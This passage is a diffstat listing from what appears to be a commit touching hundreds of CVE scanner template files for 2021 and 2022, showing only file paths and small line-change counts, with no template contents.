http/cves/2021/CVE-2021-24284.yaml | 3 +-- http/cves/2021/CVE-2021-24285.yaml | 3 +-- http/cves/2021/CVE-2021-24286.yaml | 3 +-- http/cves/2021/CVE-2021-24287.yaml | 3 +-- http/cves/2021/CVE-2021-24288.yaml | 3 +-- http/cves/2021/CVE-2021-24291.yaml | 3 +-- http/cves/2021/CVE-2021-24298.yaml | 3 +-- http/cves/2021/CVE-2021-24300.yaml | 3 +-- http/cves/2021/CVE-2021-24316.yaml | 3 +-- http/cves/2021/CVE-2021-24320.yaml | 3 +-- http/cves/2021/CVE-2021-24335.yaml | 3 +-- http/cves/2021/CVE-2021-24340.yaml | 3 +-- http/cves/2021/CVE-2021-24342.yaml | 3 +-- http/cves/2021/CVE-2021-24351.yaml | 3 +-- http/cves/2021/CVE-2021-24358.yaml | 3 +-- http/cves/2021/CVE-2021-24364.yaml | 3 +-- http/cves/2021/CVE-2021-24370.yaml | 3 +-- http/cves/2021/CVE-2021-24387.yaml | 3 +-- http/cves/2021/CVE-2021-24389.yaml | 3 +-- http/cves/2021/CVE-2021-24406.yaml | 3 +-- http/cves/2021/CVE-2021-24407.yaml | 3 +-- http/cves/2021/CVE-2021-24409.yaml | 3 +-- http/cves/2021/CVE-2021-24435.yaml | 3 +-- http/cves/2021/CVE-2021-24436.yaml | 3 +-- http/cves/2021/CVE-2021-24452.yaml | 3 +-- http/cves/2021/CVE-2021-24472.yaml | 3 +-- http/cves/2021/CVE-2021-24488.yaml | 3 +-- http/cves/2021/CVE-2021-24495.yaml | 3 +-- http/cves/2021/CVE-2021-24498.yaml | 3 +-- http/cves/2021/CVE-2021-24499.yaml | 3 +-- http/cves/2021/CVE-2021-24510.yaml | 3 +-- http/cves/2021/CVE-2021-24554.yaml | 3 +-- http/cves/2021/CVE-2021-24627.yaml | 3 +-- http/cves/2021/CVE-2021-24647.yaml | 3 +-- http/cves/2021/CVE-2021-24666.yaml | 3 +-- http/cves/2021/CVE-2021-24731.yaml | 3 +-- http/cves/2021/CVE-2021-24746.yaml | 3 +-- http/cves/2021/CVE-2021-24750.yaml | 3 +-- http/cves/2021/CVE-2021-24762.yaml | 3 +-- http/cves/2021/CVE-2021-24791.yaml | 3 +-- http/cves/2021/CVE-2021-24827.yaml | 3 +-- http/cves/2021/CVE-2021-24838.yaml | 3 +-- http/cves/2021/CVE-2021-24862.yaml | 3 +-- http/cves/2021/CVE-2021-24875.yaml | 3 +-- http/cves/2021/CVE-2021-24891.yaml | 3 +-- http/cves/2021/CVE-2021-24910.yaml | 3 +-- http/cves/2021/CVE-2021-24915.yaml | 3 +-- http/cves/2021/CVE-2021-24917.yaml | 3 +-- http/cves/2021/CVE-2021-24926.yaml | 3 +-- http/cves/2021/CVE-2021-24931.yaml | 3 +-- http/cves/2021/CVE-2021-24940.yaml | 3 +-- http/cves/2021/CVE-2021-24946.yaml | 3 +-- http/cves/2021/CVE-2021-24947.yaml | 3 +-- http/cves/2021/CVE-2021-24956.yaml | 3 +-- http/cves/2021/CVE-2021-24970.yaml | 3 +-- http/cves/2021/CVE-2021-24979.yaml | 3 +-- http/cves/2021/CVE-2021-24987.yaml | 3 +-- http/cves/2021/CVE-2021-24991.yaml | 3 +-- http/cves/2021/CVE-2021-24997.yaml | 3 +-- http/cves/2021/CVE-2021-25003.yaml | 3 +-- http/cves/2021/CVE-2021-25008.yaml | 3 +-- http/cves/2021/CVE-2021-25016.yaml | 3 +-- http/cves/2021/CVE-2021-25028.yaml | 3 +-- http/cves/2021/CVE-2021-25033.yaml | 3 +-- http/cves/2021/CVE-2021-25052.yaml | 3 +-- http/cves/2021/CVE-2021-25055.yaml | 3 +-- http/cves/2021/CVE-2021-25063.yaml | 3 +-- http/cves/2021/CVE-2021-25065.yaml | 3 +-- http/cves/2021/CVE-2021-25067.yaml | 3 +-- http/cves/2021/CVE-2021-25074.yaml | 3 +-- http/cves/2021/CVE-2021-25075.yaml | 3 +-- http/cves/2021/CVE-2021-25078.yaml | 3 +-- http/cves/2021/CVE-2021-25079.yaml | 3 +-- http/cves/2021/CVE-2021-25085.yaml | 3 +-- http/cves/2021/CVE-2021-25099.yaml | 3 +-- http/cves/2021/CVE-2021-25104.yaml | 3 +-- http/cves/2021/CVE-2021-25111.yaml | 3 +-- http/cves/2021/CVE-2021-25112.yaml | 3 +-- http/cves/2021/CVE-2021-25114.yaml | 3 +-- http/cves/2021/CVE-2021-25118.yaml | 3 +-- http/cves/2021/CVE-2021-25120.yaml | 3 +-- http/cves/2021/CVE-2021-25281.yaml | 3 +-- http/cves/2021/CVE-2021-25296.yaml | 3 +-- http/cves/2021/CVE-2021-25297.yaml | 3 +-- http/cves/2021/CVE-2021-25298.yaml | 3 +-- http/cves/2021/CVE-2021-25299.yaml | 3 +-- http/cves/2021/CVE-2021-25646.yaml | 3 +-- http/cves/2021/CVE-2021-25899.yaml | 3 +-- http/cves/2021/CVE-2021-26086.yaml | 3 +-- http/cves/2021/CVE-2021-26247.yaml | 3 +-- http/cves/2021/CVE-2021-26295.yaml | 3 +-- http/cves/2021/CVE-2021-26475.yaml | 3 +-- http/cves/2021/CVE-2021-26598.yaml | 3 +-- http/cves/2021/CVE-2021-26702.yaml | 3 +-- http/cves/2021/CVE-2021-26710.yaml | 3 +-- http/cves/2021/CVE-2021-26723.yaml | 3 +-- http/cves/2021/CVE-2021-26812.yaml | 3 +-- http/cves/2021/CVE-2021-26855.yaml | 3 +-- http/cves/2021/CVE-2021-27124.yaml | 3 +-- http/cves/2021/CVE-2021-27132.yaml | 3 +-- http/cves/2021/CVE-2021-27309.yaml | 3 +-- http/cves/2021/CVE-2021-27310.yaml | 3 +-- http/cves/2021/CVE-2021-27314.yaml | 3 +-- http/cves/2021/CVE-2021-27315.yaml | 3 +-- http/cves/2021/CVE-2021-27316.yaml | 3 +-- http/cves/2021/CVE-2021-27319.yaml | 3 +-- http/cves/2021/CVE-2021-27320.yaml | 3 +-- http/cves/2021/CVE-2021-27330.yaml | 3 +-- http/cves/2021/CVE-2021-27358.yaml | 3 +-- http/cves/2021/CVE-2021-27519.yaml | 3 +-- http/cves/2021/CVE-2021-27520.yaml | 3 +-- http/cves/2021/CVE-2021-27651.yaml | 3 +-- http/cves/2021/CVE-2021-27670.yaml | 3 +-- http/cves/2021/CVE-2021-27850.yaml | 3 +-- http/cves/2021/CVE-2021-27909.yaml | 3 +-- http/cves/2021/CVE-2021-27931.yaml | 3 +-- http/cves/2021/CVE-2021-28149.yaml | 3 +-- http/cves/2021/CVE-2021-28150.yaml | 3 +-- http/cves/2021/CVE-2021-28151.yaml | 3 +-- http/cves/2021/CVE-2021-28164.yaml | 3 +-- http/cves/2021/CVE-2021-28169.yaml | 3 +-- http/cves/2021/CVE-2021-28377.yaml | 3 +-- http/cves/2021/CVE-2021-28419.yaml | 3 +-- http/cves/2021/CVE-2021-28918.yaml | 3 +-- http/cves/2021/CVE-2021-28937.yaml | 3 +-- http/cves/2021/CVE-2021-29006.yaml | 3 +-- http/cves/2021/CVE-2021-29156.yaml | 3 +-- http/cves/2021/CVE-2021-29203.yaml | 3 +-- http/cves/2021/CVE-2021-29441.yaml | 3 +-- http/cves/2021/CVE-2021-29484.yaml | 3 +-- http/cves/2021/CVE-2021-29490.yaml | 3 +-- http/cves/2021/CVE-2021-29505.yaml | 3 +-- http/cves/2021/CVE-2021-29622.yaml | 3 +-- http/cves/2021/CVE-2021-29625.yaml | 3 +-- http/cves/2021/CVE-2021-3002.yaml | 3 +-- http/cves/2021/CVE-2021-30049.yaml | 3 +-- http/cves/2021/CVE-2021-30128.yaml | 3 +-- http/cves/2021/CVE-2021-30134.yaml | 3 +-- http/cves/2021/CVE-2021-30151.yaml | 3 +-- http/cves/2021/CVE-2021-3017.yaml | 3 +-- http/cves/2021/CVE-2021-30175.yaml | 3 +-- http/cves/2021/CVE-2021-3019.yaml | 3 +-- http/cves/2021/CVE-2021-30213.yaml | 3 +-- http/cves/2021/CVE-2021-3110.yaml | 3 +-- http/cves/2021/CVE-2021-31249.yaml | 3 +-- http/cves/2021/CVE-2021-31537.yaml | 3 +-- http/cves/2021/CVE-2021-31581.yaml | 3 +-- http/cves/2021/CVE-2021-31589.yaml | 3 +-- http/cves/2021/CVE-2021-31602.yaml | 3 +-- http/cves/2021/CVE-2021-31682.yaml | 3 +-- http/cves/2021/CVE-2021-31805.yaml | 3 +-- http/cves/2021/CVE-2021-31856.yaml | 3 +-- http/cves/2021/CVE-2021-31862.yaml | 3 +-- http/cves/2021/CVE-2021-32030.yaml | 3 +-- http/cves/2021/CVE-2021-32172.yaml | 3 +-- http/cves/2021/CVE-2021-3223.yaml | 3 +-- http/cves/2021/CVE-2021-32305.yaml | 3 +-- http/cves/2021/CVE-2021-32618.yaml | 3 +-- http/cves/2021/CVE-2021-32789.yaml | 3 +-- http/cves/2021/CVE-2021-32819.yaml | 3 +-- http/cves/2021/CVE-2021-32820.yaml | 3 +-- http/cves/2021/CVE-2021-32853.yaml | 3 +-- http/cves/2021/CVE-2021-3293.yaml | 3 +-- http/cves/2021/CVE-2021-3297.yaml | 3 +-- http/cves/2021/CVE-2021-33044.yaml | 3 +-- http/cves/2021/CVE-2021-33221.yaml | 3 +-- http/cves/2021/CVE-2021-33564.yaml | 3 +-- http/cves/2021/CVE-2021-3374.yaml | 3 +-- http/cves/2021/CVE-2021-3377.yaml | 3 +-- http/cves/2021/CVE-2021-3378.yaml | 3 +-- http/cves/2021/CVE-2021-33807.yaml | 3 +-- http/cves/2021/CVE-2021-33851.yaml | 3 +-- http/cves/2021/CVE-2021-33904.yaml | 3 +-- http/cves/2021/CVE-2021-34370.yaml | 3 +-- http/cves/2021/CVE-2021-34473.yaml | 3 +-- http/cves/2021/CVE-2021-34621.yaml | 3 +-- http/cves/2021/CVE-2021-34640.yaml | 3 +-- http/cves/2021/CVE-2021-34643.yaml | 3 +-- http/cves/2021/CVE-2021-34805.yaml | 3 +-- http/cves/2021/CVE-2021-35250.yaml | 3 +-- http/cves/2021/CVE-2021-35265.yaml | 3 +-- http/cves/2021/CVE-2021-35323.yaml | 3 +-- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 3 +-- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 3 +-- http/cves/2021/CVE-2021-35587.yaml | 3 +-- http/cves/2021/CVE-2021-3577.yaml | 3 +-- http/cves/2021/CVE-2021-36260.yaml | 3 +-- http/cves/2021/CVE-2021-36356.yaml | 3 +-- http/cves/2021/CVE-2021-36380.yaml | 3 +-- http/cves/2021/CVE-2021-36450.yaml | 3 +-- http/cves/2021/CVE-2021-3654.yaml | 3 +-- http/cves/2021/CVE-2021-36580.yaml | 3 +-- http/cves/2021/CVE-2021-36748.yaml | 3 +-- http/cves/2021/CVE-2021-36749.yaml | 3 +-- http/cves/2021/CVE-2021-36873.yaml | 3 +-- http/cves/2021/CVE-2021-37216.yaml | 3 +-- http/cves/2021/CVE-2021-37304.yaml | 3 +-- http/cves/2021/CVE-2021-37305.yaml | 3 +-- http/cves/2021/CVE-2021-37416.yaml | 3 +-- http/cves/2021/CVE-2021-37538.yaml | 3 +-- http/cves/2021/CVE-2021-37573.yaml | 3 +-- http/cves/2021/CVE-2021-37580.yaml | 3 +-- http/cves/2021/CVE-2021-37589.yaml | 3 +-- http/cves/2021/CVE-2021-37704.yaml | 3 +-- http/cves/2021/CVE-2021-37833.yaml | 3 +-- http/cves/2021/CVE-2021-38314.yaml | 3 +-- http/cves/2021/CVE-2021-38540.yaml | 3 +-- http/cves/2021/CVE-2021-38702.yaml | 3 +-- http/cves/2021/CVE-2021-38704.yaml | 3 +-- http/cves/2021/CVE-2021-38751.yaml | 3 +-- http/cves/2021/CVE-2021-39146.yaml | 3 +-- http/cves/2021/CVE-2021-39152.yaml | 3 +-- http/cves/2021/CVE-2021-39165.yaml | 3 +-- http/cves/2021/CVE-2021-39211.yaml | 3 +-- http/cves/2021/CVE-2021-39226.yaml | 3 +-- http/cves/2021/CVE-2021-39312.yaml | 3 +-- http/cves/2021/CVE-2021-39316.yaml | 3 +-- http/cves/2021/CVE-2021-39320.yaml | 3 +-- http/cves/2021/CVE-2021-39322.yaml | 3 +-- http/cves/2021/CVE-2021-39327.yaml | 3 +-- http/cves/2021/CVE-2021-39350.yaml | 3 +-- http/cves/2021/CVE-2021-39433.yaml | 3 +-- http/cves/2021/CVE-2021-39501.yaml | 3 +-- http/cves/2021/CVE-2021-40149.yaml | 3 +-- http/cves/2021/CVE-2021-40150.yaml | 3 +-- http/cves/2021/CVE-2021-40323.yaml | 3 +-- http/cves/2021/CVE-2021-40539.yaml | 3 +-- http/cves/2021/CVE-2021-40542.yaml | 3 +-- http/cves/2021/CVE-2021-40661.yaml | 3 +-- http/cves/2021/CVE-2021-40822.yaml | 3 +-- http/cves/2021/CVE-2021-40856.yaml | 3 +-- http/cves/2021/CVE-2021-40859.yaml | 3 +-- http/cves/2021/CVE-2021-40868.yaml | 3 +-- http/cves/2021/CVE-2021-40875.yaml | 3 +-- http/cves/2021/CVE-2021-40908.yaml | 3 +-- http/cves/2021/CVE-2021-40960.yaml | 3 +-- http/cves/2021/CVE-2021-40968.yaml | 3 +-- http/cves/2021/CVE-2021-40969.yaml | 3 +-- http/cves/2021/CVE-2021-40970.yaml | 3 +-- http/cves/2021/CVE-2021-40971.yaml | 3 +-- http/cves/2021/CVE-2021-40972.yaml | 3 +-- http/cves/2021/CVE-2021-40973.yaml | 3 +-- http/cves/2021/CVE-2021-40978.yaml | 3 +-- http/cves/2021/CVE-2021-41174.yaml | 3 +-- http/cves/2021/CVE-2021-41192.yaml | 3 +-- http/cves/2021/CVE-2021-41266.yaml | 3 +-- http/cves/2021/CVE-2021-41277.yaml | 3 +-- http/cves/2021/CVE-2021-41291.yaml | 3 +-- http/cves/2021/CVE-2021-41293.yaml | 3 +-- http/cves/2021/CVE-2021-41349.yaml | 3 +-- http/cves/2021/CVE-2021-41381.yaml | 3 +-- http/cves/2021/CVE-2021-41432.yaml | 3 +-- http/cves/2021/CVE-2021-41460.yaml | 3 +-- http/cves/2021/CVE-2021-41467.yaml | 3 +-- http/cves/2021/CVE-2021-41569.yaml | 3 +-- http/cves/2021/CVE-2021-41648.yaml | 3 +-- http/cves/2021/CVE-2021-41649.yaml | 3 +-- http/cves/2021/CVE-2021-41749.yaml | 3 +-- http/cves/2021/CVE-2021-41773.yaml | 3 +-- http/cves/2021/CVE-2021-41826.yaml | 3 +-- http/cves/2021/CVE-2021-41878.yaml | 3 +-- http/cves/2021/CVE-2021-41951.yaml | 3 +-- http/cves/2021/CVE-2021-42013.yaml | 3 +-- http/cves/2021/CVE-2021-42063.yaml | 3 +-- http/cves/2021/CVE-2021-42192.yaml | 3 +-- http/cves/2021/CVE-2021-42237.yaml | 3 +-- http/cves/2021/CVE-2021-42551.yaml | 3 +-- http/cves/2021/CVE-2021-42565.yaml | 3 +-- http/cves/2021/CVE-2021-42566.yaml | 3 +-- http/cves/2021/CVE-2021-42567.yaml | 3 +-- http/cves/2021/CVE-2021-42627.yaml | 3 +-- http/cves/2021/CVE-2021-42663.yaml | 3 +-- http/cves/2021/CVE-2021-42667.yaml | 3 +-- http/cves/2021/CVE-2021-42887.yaml | 3 +-- http/cves/2021/CVE-2021-43062.yaml | 3 +-- http/cves/2021/CVE-2021-43287.yaml | 3 +-- http/cves/2021/CVE-2021-43421.yaml | 3 +-- http/cves/2021/CVE-2021-43495.yaml | 3 +-- http/cves/2021/CVE-2021-43496.yaml | 3 +-- http/cves/2021/CVE-2021-43510.yaml | 3 +-- http/cves/2021/CVE-2021-43574.yaml | 3 +-- http/cves/2021/CVE-2021-43725.yaml | 3 +-- http/cves/2021/CVE-2021-43734.yaml | 3 +-- http/cves/2021/CVE-2021-43778.yaml | 3 +-- http/cves/2021/CVE-2021-43810.yaml | 3 +-- http/cves/2021/CVE-2021-44138.yaml | 3 +-- http/cves/2021/CVE-2021-44139.yaml | 3 +-- http/cves/2021/CVE-2021-44152.yaml | 3 +-- http/cves/2021/CVE-2021-44427.yaml | 3 +-- http/cves/2021/CVE-2021-44451.yaml | 3 +-- http/cves/2021/CVE-2021-44528.yaml | 3 +-- http/cves/2021/CVE-2021-44529.yaml | 3 +-- http/cves/2021/CVE-2021-44848.yaml | 3 +-- http/cves/2021/CVE-2021-45043.yaml | 3 +-- http/cves/2021/CVE-2021-45046.yaml | 3 +-- http/cves/2021/CVE-2021-45092.yaml | 3 +-- http/cves/2021/CVE-2021-45380.yaml | 3 +-- http/cves/2021/CVE-2021-45422.yaml | 3 +-- http/cves/2021/CVE-2021-45428.yaml | 3 +-- http/cves/2021/CVE-2021-45967.yaml | 3 +-- http/cves/2021/CVE-2021-45968.yaml | 3 +-- http/cves/2021/CVE-2021-46005.yaml | 3 +-- http/cves/2021/CVE-2021-46068.yaml | 3 +-- http/cves/2021/CVE-2021-46069.yaml | 3 +-- http/cves/2021/CVE-2021-46071.yaml | 3 +-- http/cves/2021/CVE-2021-46072.yaml | 3 +-- http/cves/2021/CVE-2021-46073.yaml | 3 +-- http/cves/2021/CVE-2021-46107.yaml | 3 +-- http/cves/2021/CVE-2021-46379.yaml | 3 +-- http/cves/2021/CVE-2021-46381.yaml | 3 +-- http/cves/2021/CVE-2021-46387.yaml | 3 +-- http/cves/2021/CVE-2021-46417.yaml | 3 +-- http/cves/2021/CVE-2021-46422.yaml | 3 +-- http/cves/2021/CVE-2021-46424.yaml | 3 +-- http/cves/2021/CVE-2021-46704.yaml | 3 +-- http/cves/2022/CVE-2022-0140.yaml | 3 +-- http/cves/2022/CVE-2022-0147.yaml | 3 +-- http/cves/2022/CVE-2022-0148.yaml | 3 +-- http/cves/2022/CVE-2022-0149.yaml | 3 +-- http/cves/2022/CVE-2022-0150.yaml | 3 +-- http/cves/2022/CVE-2022-0165.yaml | 3 +-- http/cves/2022/CVE-2022-0169.yaml | 3 +-- http/cves/2022/CVE-2022-0189.yaml | 3 +-- http/cves/2022/CVE-2022-0201.yaml | 3 +-- http/cves/2022/CVE-2022-0206.yaml | 3 +-- http/cves/2022/CVE-2022-0208.yaml | 3 +-- http/cves/2022/CVE-2022-0212.yaml | 3 +-- http/cves/2022/CVE-2022-0218.yaml | 3 +-- http/cves/2022/CVE-2022-0220.yaml | 3 +-- http/cves/2022/CVE-2022-0228.yaml | 3 +-- http/cves/2022/CVE-2022-0234.yaml | 3 +-- http/cves/2022/CVE-2022-0271.yaml | 3 +-- http/cves/2022/CVE-2022-0281.yaml | 3 +-- http/cves/2022/CVE-2022-0288.yaml | 3 +-- http/cves/2022/CVE-2022-0342.yaml | 3 +-- http/cves/2022/CVE-2022-0346.yaml | 3 +-- http/cves/2022/CVE-2022-0349.yaml | 3 +-- http/cves/2022/CVE-2022-0378.yaml | 3 +-- http/cves/2022/CVE-2022-0381.yaml | 3 +-- http/cves/2022/CVE-2022-0412.yaml | 3 +-- http/cves/2022/CVE-2022-0415.yaml | 3 +-- http/cves/2022/CVE-2022-0422.yaml | 3 +-- http/cves/2022/CVE-2022-0432.yaml | 3 +-- http/cves/2022/CVE-2022-0434.yaml | 3 +-- http/cves/2022/CVE-2022-0437.yaml | 3 +-- http/cves/2022/CVE-2022-0441.yaml | 3 +-- http/cves/2022/CVE-2022-0482.yaml | 3 +-- http/cves/2022/CVE-2022-0533.yaml | 3 +-- http/cves/2022/CVE-2022-0535.yaml | 3 +-- http/cves/2022/CVE-2022-0540.yaml | 3 +-- http/cves/2022/CVE-2022-0591.yaml | 3 +-- http/cves/2022/CVE-2022-0594.yaml | 3 +-- http/cves/2022/CVE-2022-0595.yaml | 3 +-- http/cves/2022/CVE-2022-0597.yaml | 3 +-- http/cves/2022/CVE-2022-0599.yaml | 3 +-- http/cves/2022/CVE-2022-0651.yaml | 3 +-- http/cves/2022/CVE-2022-0653.yaml | 3 +-- http/cves/2022/CVE-2022-0656.yaml | 3 +-- http/cves/2022/CVE-2022-0658.yaml | 3 +-- http/cves/2022/CVE-2022-0660.yaml | 3 +-- http/cves/2022/CVE-2022-0678.yaml | 3 +-- http/cves/2022/CVE-2022-0679.yaml | 3 +-- http/cves/2022/CVE-2022-0692.yaml | 3 +-- http/cves/2022/CVE-2022-0693.yaml | 3 +-- http/cves/2022/CVE-2022-0735.yaml | 3 +-- http/cves/2022/CVE-2022-0747.yaml | 3 +-- http/cves/2022/CVE-2022-0760.yaml | 3 +-- http/cves/2022/CVE-2022-0769.yaml | 3 +-- http/cves/2022/CVE-2022-0773.yaml | 3 +-- http/cves/2022/CVE-2022-0776.yaml | 3 +-- http/cves/2022/CVE-2022-0781.yaml | 3 +-- http/cves/2022/CVE-2022-0784.yaml | 3 +-- http/cves/2022/CVE-2022-0785.yaml | 3 +-- http/cves/2022/CVE-2022-0786.yaml | 3 +-- http/cves/2022/CVE-2022-0788.yaml | 3 +-- http/cves/2022/CVE-2022-0814.yaml | 3 +-- http/cves/2022/CVE-2022-0817.yaml | 3 +-- http/cves/2022/CVE-2022-0824.yaml | 3 +-- http/cves/2022/CVE-2022-0826.yaml | 3 +-- http/cves/2022/CVE-2022-0827.yaml | 3 +-- http/cves/2022/CVE-2022-0846.yaml | 3 +-- http/cves/2022/CVE-2022-0864.yaml | 3 +-- http/cves/2022/CVE-2022-0867.yaml | 3 +-- http/cves/2022/CVE-2022-0869.yaml | 3 +-- http/cves/2022/CVE-2022-0870.yaml | 3 +-- http/cves/2022/CVE-2022-0885.yaml | 3 +-- http/cves/2022/CVE-2022-0899.yaml | 3 +-- http/cves/2022/CVE-2022-0928.yaml | 3 +-- http/cves/2022/CVE-2022-0948.yaml | 3 +-- http/cves/2022/CVE-2022-0949.yaml | 3 +-- http/cves/2022/CVE-2022-0952.yaml | 3 +-- http/cves/2022/CVE-2022-0954.yaml | 3 +-- http/cves/2022/CVE-2022-0963.yaml | 3 +-- http/cves/2022/CVE-2022-0968.yaml | 3 +-- http/cves/2022/CVE-2022-1007.yaml | 3 +-- http/cves/2022/CVE-2022-1013.yaml | 3 +-- http/cves/2022/CVE-2022-1020.yaml | 3 +-- http/cves/2022/CVE-2022-1054.yaml | 3 +-- http/cves/2022/CVE-2022-1057.yaml | 3 +-- http/cves/2022/CVE-2022-1058.yaml | 3 +-- http/cves/2022/CVE-2022-1119.yaml | 3 +-- http/cves/2022/CVE-2022-1162.yaml | 3 +-- http/cves/2022/CVE-2022-1168.yaml | 3 +-- http/cves/2022/CVE-2022-1221.yaml | 3 +-- http/cves/2022/CVE-2022-1386.yaml | 3 +-- http/cves/2022/CVE-2022-1388.yaml | 3 +-- http/cves/2022/CVE-2022-1391.yaml | 3 +-- http/cves/2022/CVE-2022-1392.yaml | 3 +-- http/cves/2022/CVE-2022-1398.yaml | 3 +-- http/cves/2022/CVE-2022-1439.yaml | 3 +-- http/cves/2022/CVE-2022-1442.yaml | 3 +-- http/cves/2022/CVE-2022-1574.yaml | 3 +-- http/cves/2022/CVE-2022-1595.yaml | 3 +-- http/cves/2022/CVE-2022-1597.yaml | 3 +-- http/cves/2022/CVE-2022-1598.yaml | 3 +-- http/cves/2022/CVE-2022-1713.yaml | 3 +-- http/cves/2022/CVE-2022-1724.yaml | 3 +-- http/cves/2022/CVE-2022-1756.yaml | 3 +-- http/cves/2022/CVE-2022-1768.yaml | 3 +-- http/cves/2022/CVE-2022-1815.yaml | 3 +-- http/cves/2022/CVE-2022-1883.yaml | 3 +-- http/cves/2022/CVE-2022-1904.yaml | 3 +-- http/cves/2022/CVE-2022-1906.yaml | 3 +-- http/cves/2022/CVE-2022-1910.yaml | 3 +-- http/cves/2022/CVE-2022-1916.yaml | 3 +-- http/cves/2022/CVE-2022-1933.yaml | 3 +-- http/cves/2022/CVE-2022-1937.yaml | 3 +-- http/cves/2022/CVE-2022-1946.yaml | 3 +-- http/cves/2022/CVE-2022-1952.yaml | 3 +-- http/cves/2022/CVE-2022-2034.yaml | 3 +-- http/cves/2022/CVE-2022-21371.yaml | 3 +-- http/cves/2022/CVE-2022-21500.yaml | 3 +-- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 3 +-- http/cves/2022/CVE-2022-2185.yaml | 3 +-- http/cves/2022/CVE-2022-2187.yaml | 3 +-- http/cves/2022/CVE-2022-2219.yaml | 3 +-- http/cves/2022/CVE-2022-22242.yaml | 3 +-- http/cves/2022/CVE-2022-22536.yaml | 3 +-- http/cves/2022/CVE-2022-22733.yaml | 3 +-- http/cves/2022/CVE-2022-22897.yaml | 3 +-- http/cves/2022/CVE-2022-2290.yaml | 3 +-- http/cves/2022/CVE-2022-22947.yaml | 3 +-- http/cves/2022/CVE-2022-22954.yaml | 3 +-- http/cves/2022/CVE-2022-22965.yaml | 3 +-- http/cves/2022/CVE-2022-22972.yaml | 3 +-- http/cves/2022/CVE-2022-23102.yaml | 3 +-- http/cves/2022/CVE-2022-23131.yaml | 3 +-- http/cves/2022/CVE-2022-23134.yaml | 3 +-- http/cves/2022/CVE-2022-2314.yaml | 3 +-- http/cves/2022/CVE-2022-23178.yaml | 3 +-- http/cves/2022/CVE-2022-23347.yaml | 3 +-- http/cves/2022/CVE-2022-23348.yaml | 3 +-- http/cves/2022/CVE-2022-23544.yaml | 3 +-- http/cves/2022/CVE-2022-2373.yaml | 3 +-- http/cves/2022/CVE-2022-2376.yaml | 3 +-- http/cves/2022/CVE-2022-23779.yaml | 3 +-- http/cves/2022/CVE-2022-2379.yaml | 3 +-- http/cves/2022/CVE-2022-23808.yaml | 3 +-- http/cves/2022/CVE-2022-2383.yaml | 3 +-- http/cves/2022/CVE-2022-23854.yaml | 3 +-- http/cves/2022/CVE-2022-23881.yaml | 3 +-- http/cves/2022/CVE-2022-23898.yaml | 3 +-- http/cves/2022/CVE-2022-23944.yaml | 3 +-- http/cves/2022/CVE-2022-24124.yaml | 3 +-- http/cves/2022/CVE-2022-24129.yaml | 3 +-- http/cves/2022/CVE-2022-2414.yaml | 3 +-- http/cves/2022/CVE-2022-24181.yaml | 3 +-- http/cves/2022/CVE-2022-24223.yaml | 3 +-- http/cves/2022/CVE-2022-24260.yaml | 3 +-- http/cves/2022/CVE-2022-24264.yaml | 3 +-- http/cves/2022/CVE-2022-24265.yaml | 3 +-- http/cves/2022/CVE-2022-24266.yaml | 3 +-- http/cves/2022/CVE-2022-24384.yaml | 3 +-- http/cves/2022/CVE-2022-2462.yaml | 3 +-- http/cves/2022/CVE-2022-2467.yaml | 3 +-- http/cves/2022/CVE-2022-24681.yaml | 3 +-- http/cves/2022/CVE-2022-24716.yaml | 3 +-- http/cves/2022/CVE-2022-24816.yaml | 3 +-- http/cves/2022/CVE-2022-24856.yaml | 3 +-- http/cves/2022/CVE-2022-2487.yaml | 3 +-- http/cves/2022/CVE-2022-2488.yaml | 3 +-- http/cves/2022/CVE-2022-24899.yaml | 3 +-- http/cves/2022/CVE-2022-24900.yaml | 3 +-- http/cves/2022/CVE-2022-24990.yaml | 3 +-- http/cves/2022/CVE-2022-25082.yaml | 3 +-- http/cves/2022/CVE-2022-25125.yaml | 3 +-- http/cves/2022/CVE-2022-25148.yaml | 3 +-- http/cves/2022/CVE-2022-25149.yaml | 3 +-- http/cves/2022/CVE-2022-25216.yaml | 3 +-- http/cves/2022/CVE-2022-25323.yaml | 3 +-- http/cves/2022/CVE-2022-2535.yaml | 3 +-- http/cves/2022/CVE-2022-25356.yaml | 3 +-- http/cves/2022/CVE-2022-2544.yaml | 3 +-- http/cves/2022/CVE-2022-2546.yaml | 3 +-- http/cves/2022/CVE-2022-25481.yaml | 3 +-- http/cves/2022/CVE-2022-25485.yaml | 3 +-- http/cves/2022/CVE-2022-25486.yaml | 3 +-- http/cves/2022/CVE-2022-25487.yaml | 3 +-- http/cves/2022/CVE-2022-25488.yaml | 3 +-- http/cves/2022/CVE-2022-25489.yaml | 3 +-- http/cves/2022/CVE-2022-25497.yaml | 3 +-- http/cves/2022/CVE-2022-2551.yaml | 3 +-- http/cves/2022/CVE-2022-25568.yaml | 3 +-- http/cves/2022/CVE-2022-2599.yaml | 3 +-- http/cves/2022/CVE-2022-26148.yaml | 3 +-- http/cves/2022/CVE-2022-26159.yaml | 3 +-- http/cves/2022/CVE-2022-26233.yaml | 3 +-- http/cves/2022/CVE-2022-26263.yaml | 3 +-- http/cves/2022/CVE-2022-2627.yaml | 3 +-- http/cves/2022/CVE-2022-2633.yaml | 3 +-- http/cves/2022/CVE-2022-26352.yaml | 3 +-- http/cves/2022/CVE-2022-26564.yaml | 3 +-- http/cves/2022/CVE-2022-26833.yaml | 3 +-- http/cves/2022/CVE-2022-26960.yaml | 3 +-- http/cves/2022/CVE-2022-2733.yaml | 3 +-- http/cves/2022/CVE-2022-2756.yaml | 3 +-- http/cves/2022/CVE-2022-27593.yaml | 3 +-- http/cves/2022/CVE-2022-27849.yaml | 3 +-- http/cves/2022/CVE-2022-27926.yaml | 3 +-- http/cves/2022/CVE-2022-27927.yaml | 3 +-- http/cves/2022/CVE-2022-27984.yaml | 3 +-- http/cves/2022/CVE-2022-27985.yaml | 3 +-- http/cves/2022/CVE-2022-28022.yaml | 3 +-- http/cves/2022/CVE-2022-28023.yaml | 3 +-- http/cves/2022/CVE-2022-28032.yaml | 3 +-- http/cves/2022/CVE-2022-28079.yaml | 3 +-- http/cves/2022/CVE-2022-28080.yaml | 3 +-- http/cves/2022/CVE-2022-28117.yaml | 3 +-- http/cves/2022/CVE-2022-28219.yaml | 3 +-- http/cves/2022/CVE-2022-28290.yaml | 3 +-- http/cves/2022/CVE-2022-28363.yaml | 3 +-- http/cves/2022/CVE-2022-28365.yaml | 3 +-- http/cves/2022/CVE-2022-2863.yaml | 